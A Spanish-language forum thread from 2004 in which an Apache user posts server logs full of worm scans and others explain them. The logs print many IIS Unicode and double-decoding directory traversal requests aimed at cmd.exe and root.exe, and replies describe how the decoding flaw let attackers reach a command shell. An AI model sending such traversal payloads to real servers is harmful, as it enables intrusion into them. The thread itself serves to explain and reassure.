Log curioso del Apache

Question

Log curioso del Apache

Archivado

RaUleX 31 mar 2004 19:36 *

cuidaros mucho

2.354 mensajes
desde sep 2002

Editado 1 vez. Última: 31/03/2004 - 19:54:38 por RaUleX.

*

Vereis, llevo un par de dias viendo que el log del apache se me llena de cosas como estas:

access.log:
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:55:33 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:55:40 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:55:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:55:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:56:06 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:56:14 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:56:21 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:56:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
xxx.xxx.xxx.xxx - - [01/Apr/2004:00:56:39 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"

error.log:
[Wed Mar 31 07:54:33 2004] [error] [client xxx.xxx.xxx.xxx] request failed: URI too long
[Wed Mar 31 00:07:54 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/root.exe
[Wed Mar 31 00:07:55 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/MSADC/root.exe
[Wed Mar 31 00:07:56 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/c/winnt/system32/cmd.exe
[Wed Mar 31 00:07:56 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/d/winnt/system32/cmd.exe
[Wed Mar 31 00:07:57 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 31 00:07:58 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 31 00:07:59 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 31 00:08:01 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Wed Mar 31 00:08:02 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Wed Mar 31 00:08:05 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Wed Mar 31 00:08:06 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Wed Mar 31 00:08:12 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 31 00:08:13 2004] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/www/scripts/..%2f../winnt/system32/cmd.exe

¿Son exploits de otros servidores web o me equivoco? (que no creo

)

En caso de que sean intentos de usar algun exploit de otro servidor web ... ¿se puede saber qué demonios sale ganando el que lo explote?

¿Que exploits de apache conoceis?, es más que nada por estar un poco precavido. Esto por ejemplo me ha sonado a intento de exploit:

[Wed Mar 31 07:54:33 2004] [error] [client xxx.xxx.xxx.xxx] request failed: URI too long

Saludos [bye]

8 respuestas

Answer 1 · 2004-03-31T18:54:52+00:00

A mi tambien me pasa... supongo que seran intentos de entrar en servidores IIS de winblows

Yo no me preocupo

Salu2!

Answer 2 · 2004-03-31T18:56:08+00:00

Son scans buscando el bug Unicode (o variantes) del IIS de Microsoft, lo que intentan conseguir puede ser muy variado, pero pueden llegar a hacerse con la máquina totalmente.

He tenido el apache levantado una semana y scans de esos he tenido "tropecientos".

Un saludo

Answer 3 · 2004-03-31T19:02:51+00:00

Si, yo tambien me asusté la primera vez, pero la verdad es que ya estoy acostumbrado. Alguna vez he intentado llamar la atencion al que envia esos scans (suelen ser ISSs, mira tu por donde) pero no he tenido mucho exito la verda [burla3]

Saludos

Answer 4 · 2004-03-31T21:03:16+00:00

dreamgame 31 mar 2004 22:03

Adicto

319 mensajes
desde dic 2001
en 404

Gamertag: dreamgame360 Steam ID: dreamgame_

Esos logs no son ni mas ni menos que el blaster

Answer 5 · 2004-03-31T21:40:36+00:00

No entiendo lo de los virus ¿donde se meten?
Cuando un virus esta como este, cuand se supone que todos
pero estan vacunados el virus sigue en alguna parte ¿? de
manera que en cuanto se conecta alguin sin parche se contragia
¿Como siguen atacando? ¿desde donde? ¿siguen saturando la red?

Parece que fueran seres vivos que se escapan y no se pudieran exterminar.
¿Es que nunca se acabara con ese virus? (y otros como el)
¿Habra que reiniciar Internet entera? [666]

Por que a este paso los routers no haran más que transmitir virus

Answer 6 · 2004-03-31T22:46:05+00:00

dreamgame escribió:Esos logs no son ni mas ni menos que el blaster

El blaster no busca para contagiar ordenadores servidores IIS de microsoft, eso son scans buscando la posibilidad de expotar un bug del que adolecen algunas versiones de ese software que decodificaba erróneamente las representaciones %c0%af y similares que significan la barra /.

Había un problema con muchas versiones de ese software que decodificaba esos caracteres unicode de manera errónea antes de acceder a toda la dirección loq ue provocaba que se pudiese acceder a los directorios principales del servidor de internet y acceder a una consola de comandos (básicamente lo que se representa es ../ un retroceso de directorio).

Esos scans pueden ser de ese tipo o parecidos (l bug de doble decodificación se basaba en lo mismo pero con caracteres hexadecimales doblemente decodificados).

Un saludo.

PD: Lo que está claro es que con Apache no debes preocuparte de esos scans, ahora eso no quiere decir que esté impune de ataques de todo tipo, por lo que no está de más tenerlo bien actualizado.

Answer 7 · 2004-04-01T06:47:13+00:00

Son errores distintos los que obtienes en el access.log y en el error.log. Los del error.log no los había visto antes... pero vamos, no tienen mayor importancia como ya te han dicho

Los del access.log confirmo que son del CodeRed y similares, es decir como ya habeis dicho, bugs, exploits, worms... de "otros servidores HTTP" (MENTIRA !!!!! jaja solo de IIS).

Salu2.Ferdy

RaUleX 01 abr 2004 11:58 cuidaros mucho **2.354** mensajes desde **sep 2002** · Answer 8 · 2004-04-01T10:58:19+00:00

No, si yo preocupado no estaba porque cmd.exe y root.exe como no tengo

. Posteé porque me parece gracioso ver en los log del apache como los lamercillos tratan de colarse en un IIS que no tengo

Yo soy novatillo en esto del apache, pero si sabeis de alguna medida que es aconsejable tomar o alguna vulnerabilidad interesante que todavia no ha sido descubierta decidmelo ¿va?

Venga, un saludo